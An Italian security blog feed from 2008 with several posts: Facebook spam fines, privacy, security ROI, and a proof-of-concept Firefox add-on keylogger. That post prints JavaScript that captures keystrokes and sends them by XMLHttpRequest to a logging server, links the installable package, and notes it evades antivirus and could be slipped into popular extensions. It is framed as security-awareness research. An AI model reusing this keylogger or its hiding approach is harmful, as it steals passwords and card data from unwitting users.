src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=iTyDzr9zGUE:XUcper5KlWo:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/iTyDzr9zGUE" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/2865963997472243607?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/2865963997472243607?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/iTyDzr9zGUE/linux-iphone-ora-possibile.html" title="Linux sull'iPhone  ora è possibile" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><feedburner:origLink>http://www.armandoromeo.com/2008/12/linux-iphone-ora-possibile.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A08HQ3Yzeyp7ImA9WxRUFk8.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-1407992387676315114</id><published>2008-11-25T07:38:00.000-08:00</published><updated>2008-11-25T08:17:12.883-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2008-11-25T08:17:12.883-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="facebook" /><category scheme="http://www.blogger.com/atom/ns#" term="spam" /><title>Lo spam su facebook costa caro. 700 milioni di euro</title><content type="html">Esattamente 837 milioni di dollari. Corte di San Jose, California. &lt;a href="http://www.vnunet.com/vnunet/news/2231271/facebook-wins-record-spam-suit"&gt;Il più grande risarcimento per spam della storia&lt;/a&gt;. &lt;span style="font-weight: bold;"&gt;Adam Guerbuez&lt;/span&gt;, che non ha un avvocato e non si è presentato davanti al giudice, dovrà pagare una cifra enorme per risarcire Facebook dopo essere riuscito ad inviare  4,5 milioni di messaggi con Subject "mariujana" e "sex toys" ai membri del social network più popolato della rete.&lt;br /&gt;&lt;br /&gt;Il buon Adam, che non è un collegiale sprovveduto ma un imprenditore canadese vive ancora nella sua dimora e "sarà fatto tutto il possibile affinchè almeno una parte della sanzione venga pagata".&lt;br /&gt;&lt;br /&gt;Facebook fatturerà quest'anno intorno ai 300 milioni di dollari. Gli 837 milioni di dollari sono solo una pena esemplare (nonostante sia 3 volte il fatturato) che farà da deterrente, allontanerà malintenzionati e alleggerirà il lavoro di chi in Facebook avrebbe dovuto evitare che ciò accadesse. (Un filtro anti spam come akamai non sarebbe stato male no?)&lt;br /&gt;&lt;br /&gt;A proposito, facendo due conti, ogni messaggio è costato circa $186.&lt;br /&gt;Adam non sarà uno sprovveduto ma di sicuro non l'avrebbero preso alla Luiss.&lt;br /&gt;Come direbbe &lt;a href="http://it.wikipedia.org/wiki/Antonio_Albanese"&gt;Cetto La Qualunque&lt;/a&gt;, "non sono cifre da paese civile..."&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://dilbert.com/strips/comic/2008-11-10/" title="Dilbert.com"&gt;&lt;img style="width: 493px; height: 153px;" src="http://dilbert.com/dyn/str_strip/000000000/00000000/0000000/000000/30000/1000/300/31334/31334.strip.gif" alt="Dilbert.com" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-1407992387676315114?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/-StSDWL_iSWLx-D4z4HUnrBAjYo/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/-StSDWL_iSWLx-D4z4HUnrBAjYo/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/-StSDWL_iSWLx-D4z4HUnrBAjYo/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/-StSDWL_iSWLx-D4z4HUnrBAjYo/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=otmils1szrQ:m-S-4ADLqqA:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=otmils1szrQ:m-S-4ADLqqA:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=otmils1szrQ:m-S-4ADLqqA:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=otmils1szrQ:m-S-4ADLqqA:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=otmils1szrQ:m-S-4ADLqqA:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=otmils1szrQ:m-S-4ADLqqA:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=otmils1szrQ:m-S-4ADLqqA:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=otmils1szrQ:m-S-4ADLqqA:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/otmils1szrQ" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/1407992387676315114?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/1407992387676315114?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/otmils1szrQ/lo-spam-su-facebook-costa-caro-700.html" title="Lo spam su facebook costa caro. 700 milioni di euro" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><feedburner:origLink>http://www.armandoromeo.com/2008/11/lo-spam-su-facebook-costa-caro-700.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkANQ3s_fip7ImA9WxRVGUs.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-5505622061358714454</id><published>2008-11-17T15:34:00.000-08:00</published><updated>2008-11-17T16:39:52.546-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2008-11-17T16:39:52.546-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="web 2.0" /><category scheme="http://www.blogger.com/atom/ns#" term="dns" /><category scheme="http://www.blogger.com/atom/ns#" term="protezione dati" /><category scheme="http://www.blogger.com/atom/ns#" term="facebook" /><category scheme="http://www.blogger.com/atom/ns#" term="privacy" /><title>La privacy è come la verginità</title><content type="html">Quando l'hai persa. L'hai persa per sempre.&lt;br /&gt;&lt;br /&gt;Ma in un mondo di Social Media Whores (&lt;a href="http://blogs.hackerscenter.com/2008/11/privacy-social-network-facebook.html"&gt;Smores&lt;/a&gt;) esser casti è come essere puliti vivendo tra le scimmie per dirla alla Confucio.&lt;br /&gt;&lt;br /&gt;Ma cos'è la privacy? Avere il mio nome e cognome? La mia foto? Dove abito?&lt;br /&gt;Hanno già le mie conversazioni. Hanno inventato i &lt;a href="http://www.armandoromeo.com/2008/11/firefox-addon-fidarsi-bene.html"&gt;keylogger stealth&lt;/a&gt;. I Blackberry che sanno bene da fabbrica dove conservare i miei dati. I presidenti conniventi. Gli Antivirus che non servono a nulla. E le telecamere di video sorveglianza.&lt;br /&gt;&lt;br /&gt;Ci preoccupiamo di fare DNS che rispettino la privacy. In modo tale che il mio ISP non sappia dove navigo. Uh. Il mio ISP? Telecom. &lt;a href="http://quomedia.diesis.it/news/2818/spionaggio-telecom-si-allarga-linchiesta-il-punto"&gt;Quello dello spionaggio, si.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Abbiamo una legge sulla privacy che ha aggiunto burocrazia e costi. Tutelato il nulla.&lt;br /&gt;&lt;br /&gt;Perché il vero problema non è se risalgono alla mia abitazione. Quella la trovi su Facebook insieme alla mia relationship status. Te la do molto volentieri. Perché ho bisogno dei miei 15 minuti di popolarità. Di misurare  il significato di una precaria esistenza attraverso il numero di amici con cui "sono connesso".  E me ne compiaccio.&lt;br /&gt;&lt;br /&gt;Il vero problema è se risalgono alla mia carta di credito. Ai miei conti bancari.&lt;br /&gt;&lt;br /&gt;Ma in Italia non esiste un FTC, come negli Stati Uniti.&lt;br /&gt;&lt;a href="http://www.law.com/jsp/nylj/PubArticleNY.jsp?hubtype=FeaturedContent&amp;amp;id=1202424592218"&gt;Un ente che forza le organizzazioni che subiscono data breach a&lt;/a&gt;:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Denunciare immediatamente l'avvenuto&lt;/li&gt;&lt;li&gt;Fare mea culpa in pubblico&lt;/li&gt;&lt;li&gt;Sostenere i costi legali della class action che ne consegue&lt;/li&gt;&lt;li&gt;Pagare multe &lt;a href="http://www.msnbc.msn.com/id/11030692/"&gt;pesantissime&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Effettuare assessment di sicurezza ogni 2 anni per i &lt;span style="font-weight: bold;"&gt;20&lt;/span&gt; successivi. 20 anni...&lt;/li&gt;&lt;li&gt;20 anni...&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;Ma di quale privacy parliamo?&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Il Social Network (che mi guardo bene dal chiamare Web 2.0)&lt;br /&gt;è troppo "eccitante" per non infilartici dentro. Ci stanno già tutti dentro.&lt;br /&gt;&lt;br /&gt;Dai ammettilo. Hai bisogno di "connetterti e condividere" coi tuoi amici.&lt;br /&gt;E poi la relationship status, quel booleano che ti apre nuovi orizzonti...&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;L'11 Settembre è stato troppo "eccitante" per non infilarci, tra il panico generale, &lt;a href="http://en.wikipedia.org/wiki/PATRIOT_Act"&gt;leggi &lt;/a&gt;a &lt;a href="http://www.theregister.co.uk/2008/03/14/fisa_bill_passed/"&gt;protezione &lt;/a&gt;di chi per il governo effettuava lo spionaggio. Perché i cattivi erano tra noi. Quelli italiani usavano Telecom e stavano nella Juve.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;La privacy si perde da piccoli. Ogni mossa che fai, ogni carta che firmi, ogni sito a cui ti registri ogni volta che alzi il telefono. Non fatevi ingannare. Non c'è più nessuno vergine a questo mondo.&lt;br /&gt;E il nostro garante, non è una cintura di castità ma solo uno specchietto per le allodole.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;P.S. Quell'Armando Romeo su Facebook non sono io...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_-FDKJTRMHR0/SSINl405loI/AAAAAAAAAA8/6FL4yQyCRME/s1600-h/dilbert.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 138px;" src="http://1.bp.blogspot.com/_-FDKJTRMHR0/SSINl405loI/AAAAAAAAAA8/6FL4yQyCRME/s400/dilbert.gif" alt="" id="BLOGGER_PHOTO_ID_5269789458537485954" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-5505622061358714454?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/4sKfn5BFfKFtJPjhB-onZkgJD84/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/4sKfn5BFfKFtJPjhB-onZkgJD84/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/4sKfn5BFfKFtJPjhB-onZkgJD84/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/4sKfn5BFfKFtJPjhB-onZkgJD84/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=JTtwoDgeafQ:36dtZhue4tk:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=JTtwoDgeafQ:36dtZhue4tk:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=JTtwoDgeafQ:36dtZhue4tk:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=JTtwoDgeafQ:36dtZhue4tk:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=JTtwoDgeafQ:36dtZhue4tk:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=JTtwoDgeafQ:36dtZhue4tk:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=JTtwoDgeafQ:36dtZhue4tk:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=JTtwoDgeafQ:36dtZhue4tk:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/JTtwoDgeafQ" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/5505622061358714454?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/5505622061358714454?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/JTtwoDgeafQ/la-privacy-come-la-verginit.html" title="La privacy è come la verginità" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_-FDKJTRMHR0/SSINl405loI/AAAAAAAAAA8/6FL4yQyCRME/s72-c/dilbert.gif" height="72" width="72" /><feedburner:origLink>http://www.armandoromeo.com/2008/11/la-privacy-come-la-verginit.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0QCRn8yeyp7ImA9WxRVFE0.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-4822008687255396434</id><published>2008-11-08T06:44:00.000-08:00</published><updated>2008-11-11T05:16:07.193-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2008-11-11T05:16:07.193-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="keylogger" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="exploit" /><category scheme="http://www.blogger.com/atom/ns#" term="privacy" /><title>Firefox Addon - Fidarsi è bene...</title><content type="html">Tempo fa mi sono trovato a dover imparare il linguaggio XUL per la creazione di estensioni firefox.&lt;br /&gt;Le estensioni (o addon) di Firefox si basano principalmente su XML e Javascript. Solo raramente e in caso di funzionalità più avanzate si possono appoggiare a C++ o a Java tramite l'utilizzo di Xpcom.&lt;br /&gt;&lt;br /&gt;Mi sono chiesto dunque quale fossero i limiti di sicurezza di un addon per firefox visto e considerato che l'utente medio (e non solo) considera un addon per browser come un innocua estensione alle funzionalità già fornite dal browser.&lt;br /&gt;&lt;br /&gt;Il risultato della mia ricerca, già pubblicata qualche mese fa su &lt;a href="http://www.hackerscenter.com/"&gt;Hackers Center&lt;/a&gt;, &lt;span style="font-weight: bold;"&gt;è un keylogger completamente stealth agli anti virus e a Noscript.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Non ha bisogno di appoggiarsi a interfacce XPCOM quindi &lt;span style="font-weight: bold;"&gt;si basa esclusivamente su Javascript &lt;/span&gt;per catturare tutto ciò che viene digitato nel browser (password, carte di credito e quant'altro).&lt;br /&gt;&lt;br /&gt;Il payload catturato si può poi tranquillamente reindirizzare ad un server remoto in maniera asincrona e silenziosa visto che Javascript offre xmlHTTPRequest , fondamento di Ajax.&lt;br /&gt;Nessuna notifica dell'apertura di un link esterno viene mostrata, nemmeno nella status bar.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.hackerscenter.com/public/Firefox_poc/poc_keylogger.zip"&gt;Qui trovate l'estensione fomato xpi&lt;/a&gt;, che è possibile installare semplicemente trascinandola nella finestra del browser Firefox. Nello zip è presente un file log.php da inserire su localhost. Questo è il file che si preoccuperà di ricevere il payload (i tasti digitati) e salvarli su file sul server.&lt;br /&gt;Tutto ciò può essere testato in locale.&lt;br /&gt;&lt;br /&gt;Per visionare il codice contentuto nell'estensione:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Rinominare il file .xpi in .zip&lt;/li&gt;&lt;li&gt;Estrarlo&lt;/li&gt;&lt;li&gt;Aprire il file .xul che trovate all'interno&lt;br /&gt;&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;&lt;br /&gt;Piccola descrizione del codice javascript dell'estensione (in poc_keylogger.xul):&lt;br /&gt;&lt;blockquote&gt;&lt;p&gt;&lt;span style="font-size:85%;"&gt;document.addEventListener("keypress",onkey,false);&lt;br /&gt;var key_str='';&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size:85%;"&gt;function onkey(e)  {      &lt;/span&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;span style="font-size:85%;"&gt; key_str+=String.fromCharCode(e.charCode);          &lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;span style="font-size:85%;"&gt;if (key_str.length&gt;50) {&lt;/span&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;span style="font-size:85%;"&gt; http=new XMLHttpRequest();&lt;br /&gt;http.open("GET","http://localhost/hackerscenter/log.php?c=" + key_str,true);&lt;br /&gt;http.send(null);&lt;br /&gt;key_str='';&lt;br /&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style="font-size:85%;"&gt;}&lt;/span&gt;&lt;/blockquote&gt;&lt;p&gt; &lt;/p&gt;&lt;p&gt;&lt;span style="font-size:85%;"&gt;}   &lt;/span&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;br /&gt;Sulla prima linea aggiungamo un event listener per l'evento keypress. Ogni volta che un testo verrà premuto verrà richiamata la funzione onkey() a cui viene passato l'oggetto evento.&lt;br /&gt;&lt;br /&gt;Attraverso questo oggetto recuperiamo il codice del tasto premuto con event.charCode.&lt;br /&gt;&lt;br /&gt;Bufferizziamo i tasti premuti e poi inviamo il tutto a xmlHttpRequest che passerà il payload (contenuto del buffer) al nostro server in ascolto (log.php).&lt;br /&gt;&lt;br /&gt;Facile e potente.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://temp-e.net/files/incoming/hoffa/pwned.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 301px; height: 284px;" src="http://temp-e.net/files/incoming/hoffa/pwned.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Da notare che utilizzando Xpcom, ovvero librerie C++ o Java caricate esternamente, potremmo nascondere tale codice che nel nostro POC è facilmente leggibile.&lt;br /&gt;&lt;br /&gt;Cosa c'è di pericoloso in questo POC:&lt;br /&gt;&lt;ul&gt;&lt;li style="font-weight: bold;"&gt;Il codice Javascript viene eseguito nel contesto del browser&lt;/li&gt;&lt;li style="font-weight: bold;"&gt;L'Antivirus non lo rileva&lt;/li&gt;&lt;li style="font-weight: bold;"&gt;NoScript non lo rileva&lt;/li&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;La comunicazione del payload al server in ascolto avviene su porta 80: il Firewall non lo rileva&lt;/span&gt;&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;Da notare che con Firefox 3 ci sono maggiori restrizioni ai siti web dai quali è concesso installare un estensione. Tuttavia non esiste alcuna restrizione allo scaricamente dell'XPI di installazione e al trascinamento manuale di quest'ultimo nella finestra del browser.&lt;br /&gt;&lt;br /&gt;Tale procedura richiede ovviamente la cooperazione da parte dell'utente, motivo per il quale tale attacco non riveste una grossa minaccia all'utente esperto che è a conoscenza dei rischi legati ad addon di terze parti non fidate. (does he?)&lt;br /&gt;&lt;br /&gt;Inoltre è possibile inserire tale codice:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;in estensioni note (barra di google, delicious button...)&lt;/li&gt;&lt;li&gt;in nuove estensioni pubblicate sul sito di Mozilla Addons, che è nella whitelist del browser per quanto riguarda i siti abilitati all'installazione di Addon&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;Il secondo approccio &lt;a href="https://bugzilla.mozilla.org/show_bug.cgi?id=432406"&gt;è stato già utilizzato&lt;/a&gt; da hacker vietnamiti che hanno inserito codice malevolo nell'estensione per la lingua vietnamita disponibile direttamente dal sito di Mozilla riuscendo ad infettare centinaia di migliaia di utenti in pochi giorni.&lt;br /&gt;&lt;br /&gt;Piccola ricerca che ha lo scopo di rendere noto a tutti le potenzialità  e i problemi di sicurezza legati alle estensioni e addon di Mozilla.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-4822008687255396434?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/rFsM8PPRn1IGEOSU639NwREh8AE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/rFsM8PPRn1IGEOSU639NwREh8AE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/rFsM8PPRn1IGEOSU639NwREh8AE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/rFsM8PPRn1IGEOSU639NwREh8AE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=qv67Y14tESc:VpwMgGDA2zc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=qv67Y14tESc:VpwMgGDA2zc:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=qv67Y14tESc:VpwMgGDA2zc:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=qv67Y14tESc:VpwMgGDA2zc:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=qv67Y14tESc:VpwMgGDA2zc:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=qv67Y14tESc:VpwMgGDA2zc:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=qv67Y14tESc:VpwMgGDA2zc:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=qv67Y14tESc:VpwMgGDA2zc:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/qv67Y14tESc" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/4822008687255396434?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/4822008687255396434?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/qv67Y14tESc/firefox-addon-fidarsi-bene.html" title="Firefox Addon - Fidarsi è bene..." /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><feedburner:origLink>http://www.armandoromeo.com/2008/11/firefox-addon-fidarsi-bene.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0cDSXc9fyp7ImA9WxRWEks.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-7083375763339560357</id><published>2008-10-28T10:06:00.000-07:00</published><updated>2008-10-29T01:31:18.967-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2008-10-29T01:31:18.967-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="web application" /><category scheme="http://www.blogger.com/atom/ns#" term="protezione dati" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerabilità" /><category scheme="http://www.blogger.com/atom/ns#" term="ssl" /><category scheme="http://www.blogger.com/atom/ns#" term="rosi" /><category scheme="http://www.blogger.com/atom/ns#" term="roi" /><category scheme="http://www.blogger.com/atom/ns#" term="privacy" /><title>Sicurezza produce efficienza che produce guadagno</title><content type="html">Concludendo la trilogia di post a riguardo di investimenti nel settore della sicurezza informatica&lt;br /&gt;non potevo che concludere con un messaggio di speranza.&lt;br /&gt;&lt;br /&gt;Stravolgere il modo di pensare del management di un'azienda richiede un tempo ancora lungo&lt;br /&gt;Leggi in merito e regulations faranno da propulsore ad una nuova cultura che possa vedere la sicurezza sotto 